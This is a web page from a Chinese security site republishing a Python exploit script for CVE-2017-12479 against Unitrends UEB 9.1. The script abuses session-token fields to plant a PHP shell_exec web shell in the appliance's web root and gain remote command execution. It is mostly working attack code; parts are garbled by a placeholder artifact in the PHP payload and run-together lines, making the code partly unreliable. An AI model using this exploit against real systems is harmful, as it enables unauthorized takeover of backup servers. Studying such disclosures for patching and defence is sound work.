首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Unitrends UEB 9.1 Privilege Escalation
来源:https://twitter.com/iotennui 作者:Arave 发布时间:2017-10-10  
# Exploit Title: Authenticated lowpriv RCE for Unitrends UEB 9.1
# Date: 08/08/2017
# Exploit Authors: Benny Husted, Jared Arave, Cale Smith
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
# Vendor Homepage: https://www.unitrends.com/
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
# Version: 9.1
# Tested on: CentOS6
# CVE: CVE-2017-12479
 
import httplib
import urllib
import ssl
import sys
import base64
import random
import time
import string
import json
from optparse import OptionParser
 
# Print some helpful words:
print """
###############################################################################
Authenticated lowpriv RCE for Unitrends UEB 9.1
Tested against appliance versions:
  [+] 9.1.0-2.201611302120.CentOS6
 
This exploit utilizes some issues in UEB9 session handling to place a 
php exec one liner in the webroot of the appliance.
 
Session tokens looks like this:
 
djA6NmM0ZWMzYTEtZmYwYi00MTIxLTk3YzYtMjQzODljM2EyNjY1OjE6L3Vzci9icC9sb2dzLmRpci9ndWlfcm9vdC5sb2c6MA==
 
and decodes to this:
                                                            LOG_LVL ----,
   v --- UUID ----------------------- v   v -- LOG_DIR -----------v     v
v0:6c4ec3a1-ff0b-4121-97c6-24389c3a2665:1:/usr/bp/logs.dir/gui_root.log:0 
 
The general steps that are followed by this poc are:
 
1. Authenticate as a low priv user and receive an auth token.
2. Modify the LOG_DIR field to point to a directory in the web root
   with apache user write access, and make a request to an arbitrary resource.
   This should touch a new file at the desired location.
3. Replace the UUID token in this auth token with a php shell_exec on liner, 
   and modify the LOG_LVL parameter to a value of 5, which will ensure
   that the UUID is reflected into the log file.
4. Issue a final request, to generate a shell.php file with a single shell_exec.
   This step is not strictly necessary.
###############################################################################
"""
 
# Disable SSL Cert validation
if hasattr(ssl, '_create_unverified_context'):
            ssl._create_default_https_context = ssl._create_unverified_context
 
# Parse command line args:
usage = "Usage: %prog -r <appliance_ip> -u <username> -p <password>\n"\
 
parser = OptionParser(usage=usage)
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
          help="Target host w/ UNITRENDS UEB installation")
parser.add_option("-u", '--username', dest='username', action="store",
          help="User with any amount of privilege on unitrends device")
parser.add_option("-p", '--password', dest='password', action="store",
          help="password for this user")
 
(options, args) = parser.parse_args()
 
if not options.rhost:
  parser.error("[!] No remote host specified.\n")
 
elif options.rhost is None or options.username is None or options.password is None:
  parser.print_help()
  sys.exit(1)
 
RHOST = options.rhost
username = options.username
password = options.password
 
################################################################
# REQUEST ONE: GET A UUID.
################################################################
 
url1 = '/api/login'
 
a = {"username" : username,
     "password" : password}
 
post_body = json.dumps(a)
 
headers1 = {'Host' : RHOST}
 
print "[+] Attempting to log in to {0}, {1}:{2}".format(RHOST, username, password)
 
conn = httplib.HTTPSConnection(RHOST, 443)
conn.set_debuglevel(0)
conn.request("POST", url1, post_body, headers=headers1)
r1 = conn.getresponse()
 
################################################################
# BUILD THE AUTH TOKENS THAT WE'LL USE IN AN ATTACK.
################################################################
 
parsed_json = json.loads(r1.read())
 
if 'auth_token' not in parsed_json:
  print "[!] Didn't receive an auth token. Bad creds?"
  exit()
 
auth_encoded = parsed_json['auth_token']
auth_decoded = base64.b64decode(auth_encoded)
 
uuid = auth_decoded.split(':')[1]
ssid = auth_decoded.split(':')[2]
 
# We'll place our command shell in /var/www/html/tempPDF, since apache
# has rw in this dir.
 
log_dir = "/var/www/html/tempPDF/"
log_file = ''.join(random.choice(string.ascii_lowercase) for _ in range(5)) + '.php'
log_lvl = "5"
shell = "<?php echo shell_exec(
___FCKpd___0
GET['cmd']);?> >" auth_mod1 = "v0:{0}:{1}:{2}{3}:{4}".format(uuid, ssid, log_dir, log_file, log_lvl) auth_mod2 = "v0:{0}:{1}:{2}{3}:{4}".format(shell, ssid, log_dir, log_file, log_lvl) auth_mod1 = base64.b64encode(auth_mod1) auth_mod2 = base64.b64encode(auth_mod2) url2 = '/api/summary/current/' ################################################################ # REQUEST 2: PUT A FILE ################################################################ print "[+] Making a request to place log to http://{0}/tempPDF/{1}".format(RHOST, log_file) headers2 = {'Host' : RHOST, 'AuthToken' : auth_mod1} # touch the file conn.request("GET", url2, headers=headers2) r2 = conn.getresponse() print "[+] Making request to reflect shell_exec php to {0}.".format(log_file) headers3 = {'Host' : RHOST, 'AuthToken' : auth_mod2} # make the first command time.sleep(.5) conn.request("GET", url2, headers=headers3) conn.close() # optional cleanup time print "[+] Making a request to generate clean shell_exec at http://{0}/tempPDF/shell.php".format(RHOST) url4 = '/tempPDF/' + log_file url4 += '?cmd=echo+-e+"<?php%20echo%20shell_exec(\
___FCKpd___0
GET[%27cmd%27]);?>"+>+shell.php' conn1 = httplib.HTTPSConnection(RHOST, 443) conn1.request("GET", url4, headers=headers2) r3 = conn1.getresponse() conn1.close() url5 = "/tempPDF/shell.php" print "[+] Checking for presence of http://{0}{1}".format(RHOST, url5) headers3 = {'Host' : RHOST} conn2 = httplib.HTTPSConnection(RHOST, 443) conn2.request("GET", url5, headers=headers2) r3 = conn2.getresponse() if r3.status == 200: print "[+] Got a 200 back. We did it." print "[+] Example cmd: http://{0}{1}?cmd=id".format(RHOST, url5) else: print "Got a {0} back. Maybe this didn't work.".format(r3.status) print "Try RCE here http://{0}/tempPDF/{1}?cmd=id".format(RHOST, log_file) conn2.close() # 3. Solution: # Update to Unitrends UEB 10

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ERS Data System 1.8.1 Java Des
·Unitrends UEB 9.1 Authenticati
·Apache Tomcat < 9.0.1 (Beta) /
·Unitrends UEB 9.1 bpserverd Re
·OrientDB 2.2.2 - 2.2.22 - Remo
·IBM Notes 8.5.x/9.0.x - Denial
·Rancher Server - Docker Daemon
·Trend Micro OfficeScan Remote
·PyroBatchFTP 3.17 - Buffer Ove
·ASX To MP3 Converter Stack Ove
·WebKit JSC - 'BytecodeGenerato
·Trend Micro InterScan Messagin
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved